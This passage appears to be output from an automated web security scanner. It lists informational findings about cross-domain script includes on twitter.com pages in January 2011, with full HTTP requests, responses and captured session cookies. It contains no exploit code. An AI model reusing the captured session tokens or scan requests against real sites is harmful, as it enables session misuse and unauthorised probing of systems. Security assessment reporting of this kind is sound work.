Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTc1NzM4NTk1MTgwNTQ0Ogxjc3JmX2lkIiU2YjZmZGY1%250AZmY0YjVjMjU3NzZiNTA1NDU3ZmY5YTI4NzoHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI%250AM07wzC0B--56350870d76396cf1662faf7b1e3402c813c3212; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.431. http://twitter.com/j_hollender/status/28205461161377793

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /j_hollender/status/28205461161377793

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /j_hollender/status/28205461161377793 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225018-25935-2577
ETag: "005ad16ba87e94e3722ccf310c3a3b93"
Last-Modified: Fri, 28 Jan 2011 14:30:18 GMT
X-Runtime: 0.04800
Content-Type: text/html; charset=utf-8
Content-Length: 13823
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MjA1NDYxMTYxMzc3NzkzOgxjc3JmX2lkIiUyZmUyZWVl%250AMjgwOTk4NGY3OWE1Y2JiZTJlZjVkMWFmNzoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--8142c62a123829501cbddbd07b967c4cb31b12ef; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.432. http://twitter.com/jayleno

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /jayleno

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jayleno HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265975-96833-20443
ETag: "f04375a0a64efa284a42025451fab18b"
Last-Modified: Sat, 29 Jan 2011 01:52:55 GMT
X-Runtime: 0.01621
Content-Type: text/html; charset=utf-8
Content-Length: 52179
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.433. http://twitter.com/jbchang

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /jbchang

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jbchang HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265833-44616-32351
ETag: "48cc8fb365481ae35c75282f1de941fe"
Last-Modified: Sat, 29 Jan 2011 01:50:33 GMT
X-Runtime: 0.02514
Content-Type: text/html; charset=utf-8
Content-Length: 50548
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836" type="text/javascript"></script>
...[SNIP]...

18.434. http://twitter.com/jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /jobs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobs HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225079-13629-5258
ETag: "24f2b3be58ffd35c950d79aa330616fd"
Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT
X-Runtime: 0.03334
Content-Type: text/html; charset=utf-8
Content-Length: 18757
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlZDAwNDA4YmY4ZmE2OWEzNWU4MmQ0MDg5OTkxYmEz%250AMTU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--b979158e747a489fb5b4a97a6e15537893f77f1a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<tr>

<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=h&source=user&user=34178660@N03"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.435. http://twitter.com/jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /jobs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobs HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234774-64371-2009
ETag: "181158fedebff2659244f22b63e5501d"
Last-Modified: Fri, 28 Jan 2011 17:12:54 GMT
X-Runtime: 0.02183
Content-Type: text/html; charset=utf-8
Content-Length: 18626
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<tr>

<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=h&source=user&user=34178660@N03"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.436. http://twitter.com/joedwinell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /joedwinell/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /joedwinell/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265290-93276-31294
ETag: "17022c0def3fb9af583820ad4dacfa32"
Last-Modified: Sat, 29 Jan 2011 01:41:30 GMT
X-Runtime: 0.00712
Content-Type: text/html; charset=utf-8
Content-Length: 52042
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.437. http://twitter.com/joemccann

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /joemccann

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /joemccann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234685-75614-32475
ETag: "164afb0272952f14d229c886c56af368"
Last-Modified: Fri, 28 Jan 2011 17:11:25 GMT
X-Runtime: 0.01834
Content-Type: text/html; charset=utf-8
Content-Length: 50067
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--e41b589258f43ce00a3c10f5af818420400a35c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
